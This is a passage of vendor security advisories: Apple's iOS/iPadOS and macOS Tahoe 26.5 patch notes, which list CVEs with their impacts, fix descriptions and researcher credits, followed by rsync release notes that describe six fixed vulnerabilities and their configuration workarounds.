Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: This issue was addressed with improved access restrictions.

WebKit Bugzilla: 309698

CVE-2026-28962: Luke Francis, Vaagn Vardanian, kwak kiyong / kakaogames, Vitaly Simonovich, Adel Bouachraoui, greenbynox

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 307669

CVE-2026-43658: Do Young Park

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 308545

CVE-2026-28905: Yuhao Hu, Yuanming Lai, Chenggang Wu, and Zhe Wang

WebKit Bugzilla: 308707

CVE-2026-28847: DARKNAVY (@DarkNavyOrg), Anonymous working with TrendAI Zero Day Initiative, Daniel Rhea

WebKit Bugzilla: 309601

CVE-2026-28904: Luka Rački

WebKit Bugzilla: 310880

CVE-2026-28955: wac and Kookhwan Lee working with TrendAI Zero Day Initiative

WebKit Bugzilla: 310303

CVE-2026-28903: Mateusz Krzywicki (iVerify.io)

WebKit Bugzilla: 309628

CVE-2026-28953: Maher Azzouzi

WebKit Bugzilla: 309861

CVE-2026-28902: Tristan Madani (@TristanInSec) from Talence Security, Nathaniel Oh (@calysteon)

WebKit Bugzilla: 310207

CVE-2026-28901: Aisle offensive security research team (Joshua Rogers, Luigino Camastra, Igor Morgenstern, and Guido Vranken), Maher Azzouzi, Ngan Nguyen of Calif.io

WebKit Bugzilla: 311631

CVE-2026-28913: an anonymous researcher

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 313939

CVE-2026-28883: kwak kiyong / kakaogames

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: This issue was addressed with improved data protection.

WebKit Bugzilla: 311228

CVE-2026-28958: Cantina

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 310527

CVE-2026-28917: Vitaly Simonovich

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 310234

CVE-2026-28947: dr3dd

WebKit Bugzilla: 312180

CVE-2026-28942: Milad Nasr and Nicholas Carlini with Claude, Anthropic

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A malicious iframe may use another website’s download settings

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 311288

CVE-2026-28971: Khiem Tran

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 311131

CVE-2026-28944: Kenneth Hsu of Palo Alto Networks, Jérôme DJOUDER, dr3dd

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker in a privileged network position may be able to perform denial-of-service attack using crafted Wi-Fi packets

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28994: Alex Radocea

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to view restricted content from the lock screen

Description: A privacy issue was addressed with improved checks.

CVE-2026-28965: Abhay Kailasia (@abhay_kailasia) from Safran Mumbai India

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: An information leakage was addressed with additional validation.

CVE-2026-28920: Brendon Tiszka of Google Project Zero

We would like to acknowledge Mikael Kinnman for their assistance.

We would like to acknowledge Iván Savransky, YingQi Shi (@Mas0nShi) of DBAppSecurity's WeBin lab for their assistance.

We would like to acknowledge Brian Carpenter for their assistance.

We would like to acknowledge Gongyu Ma (@Mezone0) for their assistance.

We would like to acknowledge Mustafa Calap ​ for their assistance.

We would like to acknowledge an anonymous researcher for their assistance.

We would like to acknowledge Ryan Hileman via Xint Code (xint.io), Suresh Sundaram, an anonymous researcher for their assistance.

We would like to acknowledge Chris Staite and David Hardy of Menlo Security Inc for their assistance.

We would like to acknowledge Ilias Morad (@A2nkF_) for their assistance.

We would like to acknowledge Kun Peeks (@SwayZGl1tZyyy) for their assistance.

We would like to acknowledge Himanshu Bharti (@Xpl0itme) From Khatima for their assistance.

We would like to acknowledge Jason Grove for their assistance.

We would like to acknowledge Bishal Kafle, Jeffery Kimbrow for their assistance.

We would like to acknowledge Asaf Cohen for their assistance.

We would like to acknowledge Asilbek Salimov, Mohamed Althaf for their assistance.

We would like to acknowledge Abhay Kailasia (@abhay_kailasia) from Safran Mumbai India, Christopher Mathews for their assistance.

We would like to acknowledge Dalibor Milanovic for their assistance.

We would like to acknowledge Jacob Prezant (prezant.us) for their assistance.

We would like to acknowledge Yoav Magid for their assistance.

We would like to acknowledge Shaheen Fazim for their assistance.

We would like to acknowledge Muhammad Zaid Ghifari (Mr.ZheeV), Kalimantan Utara, Qadhafy Muhammad Tera, Vitaly Simonovich for their assistance.

We would like to acknowledge Hyeonji Son (@jir4vv1t) of Demon Team for their assistance.

We would like to acknowledge Yusuf Kelany for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 11, 2026


Related vulnerabilities: CVE-2026-43654CVE-2026-28897CVE-2026-28963CVE-2026-28955CVE-2026-28958CVE-2026-28971CVE-2026-28972CVE-2026-28995CVE-2026-28996CVE-2026-28903CVE-2026-28913CVE-2026-43655CVE-2026-43666CVE-2026-28918CVE-2026-28969CVE-2026-28991CVE-2026-28936CVE-2026-28987CVE-2026-28906CVE-2026-28957CVE-2026-39869CVE-2026-28846CVE-2026-28964CVE-2026-28953CVE-2026-28905CVE-2026-1837CVE-2026-28951CVE-2026-28904CVE-2026-28977CVE-2026-28883CVE-2026-28965CVE-2026-28959CVE-2026-28847CVE-2026-28985CVE-2026-28902CVE-2026-28917CVE-2026-28993CVE-2026-28942CVE-2026-28983CVE-2026-43660CVE-2026-43668CVE-2026-28907CVE-2026-28988CVE-2026-28990CVE-2026-28956CVE-2026-43653CVE-2026-43658CVE-2026-28986CVE-2026-28940CVE-2026-28920CVE-2026-28974CVE-2026-28994CVE-2026-28962CVE-2026-43656CVE-2026-28944CVE-2026-28943CVE-2026-43659CVE-2026-43661CVE-2026-28947CVE-2026-28992CVE-2026-28901

About the security content of macOS Tahoe 26.5 - Apple Support

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

Released May 11, 2026

Available for: macOS Tahoe

Impact: An app may be able to cause a denial-of-service

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-28991: Seiji Sakurai (@HeapSmasher)

Available for: macOS Tahoe

Impact: An app may be able to bypass certain Privacy preferences

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28988: Asaf Cohen

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28959: Dave G.

Available for: macOS Tahoe

Impact: A malicious app may be able to break out of its sandbox

Description: A logic issue was addressed with improved restrictions.

CVE-2026-28995: Vamshi Paili, Tony Gorez (@tonygo_) for Reverse Society

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may lead to a denial-of-service

Description: This is a vulnerability in open source code and Apple Software is among the affected projects. The CVE-ID was assigned by a third party. Learn more about the issue and CVE-ID at cve.org.

CVE-2026-1837

Available for: macOS Tahoe

Impact: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory

Description: A memory corruption issue was addressed with improved input validation.

CVE-2026-28956: impost0r (ret2plt)

Available for: macOS Tahoe

Impact: Processing an audio stream in a maliciously crafted media file may terminate the process

Description: The issue was addressed with improved memory handling.

CVE-2026-39869: David Ige of Beryllium Security

Available for: macOS Tahoe

Impact: An app may be able to access private information

Description: This issue was addressed through improved state management.

CVE-2026-28922: Arni Hardarson

Available for: macOS Tahoe

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved checks.

CVE-2026-28936: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs

Available for: macOS Tahoe

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2026-28918: Niels Hofmans, Anonymous working with TrendAI Zero Day Initiative

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: A parsing issue in the handling of directory paths was addressed with improved path validation.

CVE-2026-28915: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs

Available for: macOS Tahoe

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-43659: Alex Radocea

Available for: macOS Tahoe

Impact: A malicious app may be able to break out of its sandbox

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28923: Kun Peeks (@SwayZGl1tZyyy)

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28925: Aswin Kumar Gokula Kannan, Dave G.

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2026-43661: an anonymous researcher

Available for: macOS Tahoe

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved bounds checks.

CVE-2026-28977: Suresh Sundaram

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28990: Jiri Ha, Arni Hardarson

Available for: macOS Tahoe

Impact: A malicious app may be able to break out of its sandbox

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28978: wdszzml and Atuin Automated Vulnerability Discovery Engine

Available for: macOS Tahoe

Impact: An attacker may be able to cause unexpected app termination

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2026-28992: Johnny Franks (@zeroxjf)

Available for: macOS Tahoe

Impact: An app may be able to determine kernel memory layout

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28943: Google Threat Analysis Group

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28969: Mihalis Haatainen, Ari Hawking, Ashish Kunwar

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-43655: Somair Ansar and an anonymous researcher

Available for: macOS Tahoe

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2026-43654: Vaagn Vardanian, Nathaniel Oh (@calysteon)

Available for: macOS Tahoe

Impact: An app may be able to modify protected parts of the file system

Description: A denial of service issue was addressed by removing the vulnerable code.

CVE-2026-28908: beist

Available for: macOS Tahoe

Impact: A maliciously crafted disk image may bypass Gatekeeper checks

Description: A file quarantine bypass was addressed with additional checks.

CVE-2026-28954: Yiğit Can YILMAZ (@yilmazcanyigit)

Available for: macOS Tahoe

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: A buffer overflow was addressed with improved input validation.

CVE-2026-28897: popku1337, Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Robert Tran, Aswin kumar Gokulakannan

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: An integer overflow was addressed with improved input validation.

CVE-2026-28952: Calif.io in collaboration with Claude and Anthropic Research

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2026-28951: Csaba Fitzl (@theevilbit) of Iru

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-28972: Billy Jheng Bing Jhong and Pan Zhenpeng (@Peterpan0927) of STAR Labs SG Pte. Ltd., Ryan Hileman via Xint Code (xint.io)

Available for: macOS Tahoe

Impact: An app may be able to cause unexpected system termination

Description: A race condition was addressed with additional validation.

CVE-2026-28986: Chris Betz, Tristan Madani (@TristanInSec) from Talence Security, Ryan Hileman via Xint Code (xint.io)

Available for: macOS Tahoe

Impact: An app may be able to leak sensitive kernel state

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28987: Dhiyanesh Selvaraj (@redroot97)

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause a denial of service

Description: A type confusion issue was addressed with improved checks.

CVE-2026-28983: Ruslan Dautov

Available for: macOS Tahoe

Impact: Replying to an email could display remote images in Mail in Lockdown Mode

Description: A logic issue was addressed with improved checks.

CVE-2026-28929: Yiğit Can YILMAZ (@yilmazcanyigit)

Available for: macOS Tahoe

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2026-43653: Atul R V

Available for: macOS Tahoe

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: A null pointer dereference was addressed with improved input validation.

CVE-2026-28985: Omar Cerrito

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A use after free issue was addressed with improved memory management.

CVE-2026-43668: Anton Pakhunov, Ricardo Prado

Available for: macOS Tahoe

Impact: An attacker on the local network may be able to cause a denial-of-service

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2026-43666: Ian van der Wurff (ian.nl)

Available for: macOS Tahoe

Impact: Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents

Description: The issue was addressed with improved checks.

CVE-2026-28941: Michael DePlante (@izobashi) of TrendAI Zero Day Initiative

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28940: Michael DePlante (@izobashi) of TrendAI Zero Day Initiative

Available for: macOS Tahoe

Impact: An attacker with physical access to a locked device may be able to view sensitive user information

Description: This issue was addressed with improved checks.

CVE-2026-28961: Dan Raviv

Available for: macOS Tahoe

Impact: An attacker may be able to track users through their IP address

Description: This issue was addressed through improved state management.

CVE-2026-28906: Ilya Sc. Jowell A.

Available for: macOS Tahoe

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2026-43656: Peter Malone

Available for: macOS Tahoe

Impact: An app may be able to access protected user data

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-43652: Asaf Cohen

Available for: macOS Tahoe

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-39870: Peter Malone

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause unexpected app termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28846: Peter Malone

Available for: macOS Tahoe

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed by adding an additional prompt for user consent.

CVE-2026-28993: Doron Assness

Available for: macOS Tahoe

Impact: A remote attacker may be able to cause unexpected system termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28848: Peter Malone, Dave G. and Alex Radocea of Supernetworks

Available for: macOS Tahoe

Impact: An app may be able to access protected user data

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28930: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Available for: macOS Tahoe

Impact: An app may be able to cause a denial-of-service

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2026-28974: Andy Koo (@andykoo) of Hexens

Available for: macOS Tahoe

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-28996: Alex Radocea

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: A consistency issue was addressed with improved state handling.

CVE-2026-28919: Amy (amys.website)

Available for: macOS Tahoe

Impact: An app may be able to access Contacts without user consent

Description: A race condition was addressed with improved handling of symbolic links.

CVE-2026-28924: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs, YingQi Shi (@Mas0nShi) of DBAppSecurity's WeBin lab

Available for: macOS Tahoe

Impact: An app may be able to observe unprotected user data

Description: A path handling issue was addressed with improved logic.

CVE-2026-39871: an anonymous researcher

Available for: macOS Tahoe

Impact: An app may be able to gain root privileges

Description: An information leakage was addressed with additional validation.

CVE-2026-28976: David Ige - Beryllium Security

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A validation issue was addressed with improved logic.

WebKit Bugzilla: 308906

CVE-2026-43660: Cantina

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 308675

CVE-2026-28907: Cantina

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: This issue was addressed with improved access restrictions.

WebKit Bugzilla: 309698

CVE-2026-28962: Luke Francis, Vaagn Vardanian, kwak kiyong / kakaogames, Vitaly Simonovich, Adel Bouachraoui, greenbynox

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 307669

CVE-2026-43658: Do Young Park

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 308545

CVE-2026-28905: Yuhao Hu, Yuanming Lai, Chenggang Wu, and Zhe Wang

WebKit Bugzilla: 308707

CVE-2026-28847: DARKNAVY (@DarkNavyOrg), Anonymous working with TrendAI Zero Day Initiative, Daniel Rhea

WebKit Bugzilla: 309601

CVE-2026-28904: Luka Rački

WebKit Bugzilla: 310880

CVE-2026-28955: wac and Kookhwan Lee working with TrendAI Zero Day Initiative

WebKit Bugzilla: 310303

CVE-2026-28903: Mateusz Krzywicki (iVerify.io)

WebKit Bugzilla: 309628

CVE-2026-28953: Maher Azzouzi

WebKit Bugzilla: 309861

CVE-2026-28902: Tristan Madani (@TristanInSec) from Talence Security, Nathaniel Oh (@calysteon)

WebKit Bugzilla: 310207

CVE-2026-28901: Aisle offensive security research team (Joshua Rogers, Luigino Camastra, Igor Morgenstern, and Guido Vranken), Maher Azzouzi, Ngan Nguyen of Calif.io

WebKit Bugzilla: 311631

CVE-2026-28913: an anonymous researcher

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 313939

CVE-2026-28883: kwak kiyong / kakaogames

Available for: macOS Tahoe

Impact: An app may be able to access sensitive user data

Description: This issue was addressed with improved data protection.

WebKit Bugzilla: 311228

CVE-2026-28958: Cantina

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved input validation.

WebKit Bugzilla: 310527

CVE-2026-28917: Vitaly Simonovich

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 310234

CVE-2026-28947: dr3dd

WebKit Bugzilla: 310544

CVE-2026-28946: Gia Bui (@yabeow) from Calif.io, dr3dd, w0wbox

WebKit Bugzilla: 312180

CVE-2026-28942: Milad Nasr and Nicholas Carlini with Claude, Anthropic

Available for: macOS Tahoe

Impact: A malicious iframe may use another website’s download settings

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 311288

CVE-2026-28971: Khiem Tran

Available for: macOS Tahoe

Impact: Processing maliciously crafted web content may lead to an unexpected process crash

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 311131

CVE-2026-28944: Kenneth Hsu of Palo Alto Networks, Jérôme DJOUDER, dr3dd

Available for: macOS Tahoe

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2026-28819: Wang Yu

Available for: macOS Tahoe

Impact: An attacker in a privileged network position may be able to perform denial-of-service attack using crafted Wi-Fi packets

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28994: Alex Radocea

Available for: macOS Tahoe

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: A logic issue was addressed with improved file handling.

CVE-2026-28914: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs (nosebeard.co)

Available for: macOS Tahoe

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: An information leakage was addressed with additional validation.

CVE-2026-28920: Brendon Tiszka of Google Project Zero

We would like to acknowledge Mikael Kinnman for their assistance.

We would like to acknowledge Asaf Cohen, Johan Wahyudi for their assistance.

We would like to acknowledge Iván Savransky, Kun Peeks (@SwayZGl1tZyyy), YingQi Shi (@Mas0nShi) of DBAppSecurity's WeBin lab for their assistance.

We would like to acknowledge Brian Carpenter for their assistance.

We would like to acknowledge Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs for their assistance.

We would like to acknowledge Jordan Pittman for their assistance.

We would like to acknowledge Mustafa Calap ​ for their assistance.

We would like to acknowledge an anonymous researcher for their assistance.

We would like to acknowledge Ryan Hileman via Xint Code (xint.io), an anonymous researcher for their assistance.

We would like to acknowledge Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs for their assistance.

We would like to acknowledge Chris Staite and David Hardy of Menlo Security Inc for their assistance.

We would like to acknowledge Ilias Morad (@A2nkF_) for their assistance.

We would like to acknowledge Kun Peeks (@SwayZGl1tZyyy) for their assistance.

We would like to acknowledge Jason Grove for their assistance.

We would like to acknowledge Jeffery Kimbrow for their assistance.

We would like to acknowledge Asilbek Salimov for their assistance.

We would like to acknowledge Anand Patil for their assistance.

We would like to acknowledge Christopher Mathews for their assistance.

We would like to acknowledge Cem Onat Karagun, Surya Kushwaha for their assistance.

We would like to acknowledge sean mutuku for their assistance.

We would like to acknowledge Robert Mindo for their assistance.

We would like to acknowledge Yoav Magid for their assistance.

We would like to acknowledge Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs for their assistance.

We would like to acknowledge Muhammad Zaid Ghifari (Mr.ZheeV), Kalimantan Utara, Qadhafy Muhammad Tera, Vitaly Simonovich for their assistance.

We would like to acknowledge Hyeonji Son (@jir4vv1t) of Demon Team for their assistance.

We would like to acknowledge Kun Peeks (@SwayZGl1tZyyy) for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 11, 2026


Related vulnerabilities: CVE-2026-28974CVE-2026-28995CVE-2026-28985CVE-2026-28993CVE-2026-28942CVE-2026-28902CVE-2026-28978CVE-2026-28986CVE-2026-28947CVE-2026-28847CVE-2026-28944CVE-2026-28992CVE-2026-28953CVE-2026-28987CVE-2026-43660CVE-2026-28905CVE-2026-28925CVE-2026-39871CVE-2026-28954CVE-2026-28988CVE-2026-39869CVE-2026-43661CVE-2026-28819CVE-2026-28919CVE-2026-28952CVE-2026-28907CVE-2026-43655CVE-2026-28994CVE-2026-28940CVE-2026-28846CVE-2026-28990CVE-2026-28901CVE-2026-28962CVE-2026-28969CVE-2026-28956CVE-2026-28959CVE-2026-28977CVE-2026-39870CVE-2026-28913CVE-2026-28906CVE-2026-28996CVE-2026-28971CVE-2026-1837CVE-2026-43666CVE-2026-28941CVE-2026-28914CVE-2026-43653CVE-2026-28903CVE-2026-43652CVE-2026-28920CVE-2026-28976CVE-2026-28991CVE-2026-43659CVE-2026-43658CVE-2026-43654CVE-2026-28897CVE-2026-28915CVE-2026-28924CVE-2026-28848CVE-2026-28972CVE-2026-28936CVE-2026-28929CVE-2026-28917CVE-2026-28951CVE-2026-43656CVE-2026-28918CVE-2026-28943CVE-2026-28946CVE-2026-28923CVE-2026-43668CVE-2026-28883CVE-2026-28904CVE-2026-28958CVE-2026-28922CVE-2026-28983CVE-2026-28955CVE-2026-28961CVE-2026-28908CVE-2026-28930

https://download.samba.org/pub/rsync/NEWS.html

SECURITY FIXES: Six CVEs are fixed in this release. All six are assigned by VulnCheck as CNA. Affected versions are 3.4.2 and earlier in every case. Three of the six (CVE-2026-29518, CVE-2026-43617, CVE-2026-43619) require non-default daemon configuration to reach: the first and third need use chroot = no for a module, the second needs daemon chroot = ... set in rsyncd.conf. Two (CVE-2026-43618, CVE-2026-43620) are reachable from a normal pull or a normal authenticated daemon connection. The sixth (CVE-2026-45232) is reachable only when RSYNC_PROXY is set and the proxy (or a MITM) returns a pathological response. Many thanks to the external researchers who reported these issues.

CVE-2026-29518 (CVSS v4.0 7.3, HIGH): TOCTOU symlink race condition allowing local privilege escalation in daemon mode without chroot. An rsync daemon configured with "use chroot = no" was exposed to a time-of-check / time-of-use race on parent path components: a local attacker with write access to a module could replace a parent directory component with a symlink between the receiver's check and its open(), redirecting reads (basis-file disclosure) and writes (file overwrite) outside the module. Default "use chroot = yes" is not exposed. secure_relative_open() (added in 3.4.0 for CVE-2024-12086) was previously unused in the daemon-no-chroot case; the fix enables it there and reroutes the sender's read-path opens through it. Reported by Nullx3D (Batuhan Sancak), Damien Neil and Michael Stapelberg.

CVE-2026-43617 (CVSS v3.1 4.8, MEDIUM): Hostname/ACL bypass on an rsync daemon configured with daemon chroot = /X in rsyncd.conf when the chroot tree lacks DNS resolution support. The reverse-DNS lookup of the connecting client was performed after the daemon chroot had been entered; if /X did not contain the libc resolver fixtures (/etc/resolv.conf, /etc/nsswitch.conf, /etc/hosts, NSS service modules) the lookup failed and the connecting hostname was set to "UNKNOWN", causing hostname-based deny rules to silently fail open. IP-based ACLs are unaffected. The per-module use chroot setting is unrelated to this issue. The fix performs the lookup before entering the daemon chroot. Reported by MegaManSec.

CVE-2026-43618 (CVSS v3.1 8.1, HIGH): Integer overflow in the compressed-token decoder enabling remote memory disclosure to an authenticated daemon peer. The receiver accumulated a 32-bit signed counter without overflow checking; a malicious sender could trigger an overflow that, with careful manipulation, leaked process memory contents to the attacker -⁠-⁠ environment variables, passwords, heap and library pointers -⁠-⁠ significantly weakening ASLR. The fix bounds the counter and adds wire-input validation in several adjacent places (defence-in-depth). Workaround for older releases: refuse options = compress in rsyncd.conf. Reported by Omar Elsayed.

CVE-2026-43619 (CVSS v3.1 6.3, MEDIUM): Symlink races on path-based system calls in "use chroot = no" daemon mode (generalisation of CVE-2026-29518). Earlier fixes for symlink races on the receiver's open() call missed the same race class on every other path-based system call: chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir and lstat. The fix routes each affected path-based syscall through a parent dirfd opened under RESOLVE_BENEATH-equivalent kernel-enforced confinement (openat2 on Linux 5.6+, O_RESOLVE_BENEATH on FreeBSD 13+ and macOS 15+, per-component O_NOFOLLOW walk elsewhere). Default "use chroot = yes" is not exposed. Reported by Andrew Tridgell as a follow-on audit of CVE-2026-29518.

CVE-2026-43620 (CVSS v3.1 6.5, MEDIUM): Out-of-bounds read in the receiver's recv_files() enabling remote denial-of-service of any client pulling from a malicious server (incomplete fix of commit 797e17f). The earlier parent_ndx<0 guard added to send_files() was not applied to the visually-identical block in recv_files(). A malicious rsync server can drive any connecting client into a deterministic SIGSEGV by setting CF_INC_RECURSE in the compatibility flags and sending a crafted file list and transfer record. inc_recurse is the protocol-30+ default, so no special options are required on the victim. Workaround for older releases: --no-inc-recursive on the client. Reported by Pratham Gupta.

